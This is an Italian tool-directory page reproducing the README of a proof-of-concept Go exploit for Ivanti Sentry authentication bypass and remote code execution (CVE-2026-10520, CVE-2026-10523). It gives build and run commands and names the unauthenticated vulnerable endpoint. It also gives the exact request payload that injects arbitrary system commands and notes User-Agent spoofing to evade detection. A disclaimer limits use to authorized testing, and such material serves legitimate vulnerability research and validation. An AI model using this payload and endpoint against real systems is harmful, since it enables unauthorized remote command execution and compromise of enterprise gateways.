Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-10523-Ivanti-sentry — Strumento di rilevamento proof-of-concept per le vulnerabilità di bypass dell'autenticazione e RCE di Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Invia richieste API appositamente create per eseguire comandi di sistema e convalidare le distribuzioni vulnerabili. | Kitploit
Strumenti/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlAutenticazione
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Strumento di rilevamento proof-of-concept per le vulnerabilità di bypass dell'autenticazione e RCE di Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Invia richieste API appositamente create per eseguire comandi di sistema e convalidare le distribuzioni vulnerabili.

Vedi RepositorySito web
3132 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-10523 - Strumento di rilevamento RCE per Ivanti Sentry

Un completo strumento proof-of-concept per il rilevamento e la validazione di vulnerabilità Ivanti Sentry relative al bypass dell'autenticazione e all'esecuzione remota di codice. Questo strumento identifica sistemi vulnerabili a CVE-2026-10520 e CVE-2026-10523.

Panoramica

Questo progetto è progettato per rilevare e convalidare se un'istanza Ivanti Sentry è vulnerabile a critici difetti di bypass dell'autenticazione ed esecuzione remota di codice. Lo strumento invia messaggi appositamente predisposti tramite l'API endpoint di Ivanti Sentry per eseguire comandi di sistema ed estrarre i risultati, consentendo a ricercatori di sicurezza e penetration tester di identificare distribuzioni vulnerabili.

Dettagli della vulnerabilità

CVE-2026-10520

Vulnerabilità di bypass dell'autenticazione in Ivanti Sentry che consente l'accesso non autenticato a endpoint API riservati.

CVE-2026-10523

Vulnerabilità di esecuzione remota di codice in Ivanti Sentry che permette l'esecuzione di comandi arbitrari di sistema attraverso l'API di messaggistica quando combinata con il bypass dell'autenticazione.

Caratteristiche

  • Rilevamento non autenticato di istanze Ivanti Sentry vulnerabili
  • Capacità di esecuzione di comandi di sistema per la convalida proof-of-concept
  • Supporto per connessioni HTTP e HTTPS con bypass della verifica TLS
  • Supporto proxy per test attraverso intermediari
  • Estrazione pulita dell'output dei comandi da risposte XML
  • Gestione sicura degli errori con feedback informativo
  • Timeout configurabile e limiti della dimensione della risposta

Requisiti

  • Go 1.26.4 o superiore
  • Accesso di rete all'istanza Ivanti Sentry di destinazione
  • URL di destinazione valido con protocollo (HTTP o HTTPS)

Installazione

Clona il repository e spostati nella directory del progetto:

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

Ottieni l'inizializzazione e la libreria dei pacchetti

root@kitploit:~
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

Compila l'eseguibile:

root@kitploit:~
go build -o tot_poc tot_poc.go

Utilizzo

Screen Capture

Lo strumento richiede due parametri obbligatori: URL di destinazione e comando da eseguire.

Utilizzo base

Screen Capture

Esegui un comando semplice sul target:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

Opzioni da riga di comando

  • -url (obbligatorio): URL base del target incluso il protocollo (es. https://127.0.0.1:8443)
  • -cmd (obbligatorio): Comando da eseguire per il rilevamento della vulnerabilità (es. "uname -a", "id", "whoami")
  • -p o -proxy (opzionale): Indirizzo e porta del proxy per instradare il traffico (es. 127.0.0.1:8080)

Esempi di utilizzo

Screen Capture

Rileva la vulnerabilità con un semplice comando di informazioni di sistema:

root@kitploit:~
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

Esegui con configurazione proxy:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

Esegui comando per estrarre informazioni di sistema:

root@kitploit:~
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

Output

Lo strumento mostrerà:

  1. Un banner con informazioni sulla vulnerabilità
  2. URL di destinazione, comando e configurazione proxy (se applicabile)
  3. Messaggi di stato in tempo reale che indicano l'avanzamento della richiesta
  4. Risultati dell'esecuzione del comando se il target è vulnerabile
  5. Messaggi di errore se il target non è vulnerabile o la connessione fallisce

Output di rilevamento riuscito

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Invio del controllo di esecuzione comando a: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Il target sembra essere vulnerabile.

Output del comando:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

Output di rilevamento fallito

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Invio del controllo di esecuzione comando a: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Il target non sembra essere vulnerabile.

Dettagli tecnici

Vettore d'attacco

Lo strumento sfrutta l'endpoint /mics/api/v2/sentry/mics-config/handleMessage accessibile senza autenticazione. Il payload è costruito come:

root@kitploit:~
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMANDO]</reqandres></commandexec>

La risposta contiene l'output del comando in formato XML all'interno di un tag success.

Funzionalità di sicurezza

  • Bypass della verifica TLS per testare certificati autofirmati
  • Timeout HTTP configurabile per evitare richieste sospese
  • Limitazione della dimensione della risposta (10 MB) per prevenire esaurimento della memoria
  • Gestione corretta degli errori per risposte malformate
  • Spoofing dello User-Agent per evitare semplici meccanismi di rilevamento

Come funziona

  1. Analizza gli argomenti da riga di comando per URL di destinazione e comando
  2. Crea un client HTTP con configurazione proxy opzionale
  3. Costruisce il payload con il comando fornito dall'utente
  4. Invia una richiesta POST all'endpoint vulnerabile
  5. Estrae l'output del comando dalla struttura della risposta XML
  6. Mostra i risultati o i messaggi di errore appropriati

Disclaimer

Questo strumento è fornito esclusivamente per scopi di test di sicurezza autorizzati e ricerca. Gli utenti sono gli unici responsabili di assicurarsi di avere la dovuta autorizzazione prima di testare qualsiasi sistema. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori declinano ogni responsabilità per uso improprio o danni causati da questo strumento.

Requisiti e limitazioni

  • Il target deve essere un'istanza Ivanti Sentry vulnerabile
  • È richiesta la connettività di rete al sistema di destinazione
  • Il timeout predefinito è di 10 secondi per richiesta
  • La dimensione massima della risposta è limitata a 10 MB
  • Efficace solo su sistemi con versioni vulnerabili di Ivanti Sentry
  • La convalida del certificato TLS è disabilitata per scopi di test

Autore

GhostGTR666 - Gagaltotal666

Repository

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

Licenza

Questo progetto è fornito così com'è per scopi di ricerca sulla sicurezza e formativi.

Riferimenti

  • CVE-2026-10520: Bypass dell'autenticazione Ivanti Sentry
  • CVE-2026-10523: Esecuzione remota di codice Ivanti Sentry
Scarica lo strumento